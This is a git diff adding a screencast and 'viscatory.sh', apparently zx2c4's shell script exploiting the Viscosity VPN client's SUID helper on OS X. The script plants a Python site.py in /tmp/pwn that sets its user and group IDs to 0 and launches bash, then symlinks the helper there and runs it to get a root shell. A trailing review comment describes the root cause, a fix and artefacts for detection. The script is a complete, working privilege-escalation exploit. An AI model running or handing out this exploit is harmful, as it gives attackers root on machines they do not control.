-rw-r--r-- | screencast.ogv | bin | 0 -> 304901 bytes | |||
-rwxr-xr-x | viscatory.sh | 32 |
2 files changed, 32 insertions, 0 deletions
diff --git a/screencast.ogv b/screencast.ogv
Binary files differ
new file mode 100644
index 0000000..b778bf8
--- /dev/null
+++ b/screencast.ogv
diff --git a/viscatory.sh b/viscatory.sh
new file mode 100755
index 0000000..4f323b3
--- /dev/null
+++ b/viscatory.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+#
+##########################
+# Viscatory #
+# #
+# zx2c4 #
+##########################
+#
+# After the hullabaloo from the Tunnelblick local root, savy Mac users
+# began defending Viscosity, another OS X VPN client. They figured, since
+# they spent money on Viscosity, surely it would be better designed than
+# the free alternative.
+#
+# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
+# the win. Here, the SUID helper will execute site.py in its enclosing
+# folder. A simple symlink, and we have root.
+
+echo "[+] Crafting payload."
+mkdir -p -v /tmp/pwn
+cat > /tmp/pwn/site.py <<_EOF
+import os
+print "[+] Cleaning up."
+os.system("rm -rvf /tmp/pwn")
+print "[+] Getting root."
+os.setuid(0)
+os.setgid(0)
+os.execl("/bin/bash", "bash")
+_EOF
+echo "[+] Making symlink."
+ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
+echo "[+] Running vulnerable SUID helper."
+exec /tmp/pwn/root |
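Review bot: The header comment in viscatory.sh states the root cause only informally ("will execute site.py in its enclosing folder"), which leaves the defensive takeaway unstated for anyone auditing the helper. From the symlink step alone it appears the SUID helper derives the location of `site.py` from the path it was invoked through rather than from the resolved location of the real binary; I would add `# Root cause: the SUID helper apparently loads site.py relative to its invocation path, which a caller controls via a symlink; the helper-side fix is to resolve its real executable path and refuse to load code from a directory not owned by root or writable by others.` As a detection note for the same comment block, the observable artifacts here are a symlink to ViscosityHelper under /tmp and the helper being executed from outside /Applications/Viscosity.app, both of which an endpoint monitor can flag. The `print` statements and `os.setuid`/`os.setgid` calls are Python 2 style, which is worth stating in the comment so a reader does not expect the dropped file to run under Python 3.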